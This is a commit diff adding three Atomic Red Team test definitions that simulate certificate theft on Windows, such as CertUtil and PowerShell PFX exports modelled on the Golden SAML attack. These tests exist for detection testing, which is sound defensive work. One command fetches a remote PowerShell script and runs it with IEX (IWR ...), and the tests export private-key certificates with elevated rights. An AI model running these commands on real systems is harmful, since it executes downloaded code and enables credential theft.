Merge pull request #2312 from redcanaryco/CertUtil

Export Certificates
2023-02-06 13:24:41 +00:00
parent d3131e5583 a17a26f2f9
commit ab7bfc70cc
1 changed files with 75 additions and 0 deletions
@@ -197,3 +197,78 @@ atomic_tests:
      Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
      Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
    name: powershell
+- name: CertUtil ExportPFX
+  description: |
+    The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack.
+    Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+    Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+    Reference: https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
+  supported_platforms:
+  - windows
+  input_arguments:
+    output:
+      description: file path to export to
+      type: Path
+      default: c:\temp\atomic.pfx
+    password:
+      description: password for cert
+      type: String
+      default: password
+  executor:
+    command: |
+       IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) 
+       certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output}
+    cleanup_command: |
+       Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item 
+    name: powershell
+    elevation_required: true
+- name: Export Root Certificate with Export-PFXCertificate
+  description: |
+    Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet.
+    Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate.
+  supported_platforms:
+  - windows
+  input_arguments:
+    pfx_path:
+      description: output path of the certificate
+      type: String
+      default: $env:Temp\atomicredteam.pfx
+  executor:
+    command: |
+      $mypwd = ConvertTo-SecureString -String "AtomicRedTeam" -Force -AsPlainText
+      $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+      Set-Location Cert:\LocalMachine\My
+      Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath #{pfx_path} -Password $mypwd
+    cleanup_command: |
+      try {
+      $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
+      Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+      Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+      } catch { }
+    name: powershell
+    elevation_required: true
+- name: Export Root Certificate with Export-Certificate
+  description: |
+    Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet.
+    Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate.
+  supported_platforms:
+  - windows
+  input_arguments:
+    pfx_path:
+      description: Path of the certificate
+      type: Path
+      default: $env:Temp\AtomicRedTeam.cer
+  executor:
+    command: |
+      $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+      Set-Location Cert:\LocalMachine\My
+      Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
+    cleanup_command: |
+      try {
+         $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
+         Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+         Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+      }
+      catch { }
+    name: powershell
+    elevation_required: true